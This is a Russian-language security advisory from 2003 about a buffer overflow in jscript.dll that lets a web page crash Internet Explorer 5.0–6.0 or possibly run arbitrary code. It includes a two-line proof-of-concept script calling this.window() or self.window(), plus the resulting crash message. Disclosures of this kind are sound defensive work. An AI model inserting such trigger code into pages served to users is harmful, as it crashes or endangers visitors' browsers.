Security Lab

Удаленное переполнение буфера в Microsoft Windows Script Engine

Дата публикации:22.05.2003
Всего просмотров:1255
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в Microsoft Windows Script Engine. Удаленный пользователь может аварийно завершить работу IE или выполнить произвольный код с привилегиями текущего пользователя.

Переполнение буфера обнаружено в библиотеке обработки JScript - jscript.dll, расположенной в %SystemRoot%\system32. Сообщается, что уязвимость может использоваться для выполнения произвольного кода. Пример:

<script>
  this.window();
</script>
или
<script>
  self.window();
</script>
Работа IE аварийно завершится со следующей ошибкой:
The instruction at "0x6b73aa15" referenced memory at "0x006f0063". 
The memory could not be "read".
Уязвимость обнаружена в Internet Explorer 5.0-6.0
Ссылки: Microsoft's Windows Script Engine this/self.window() Security Flaw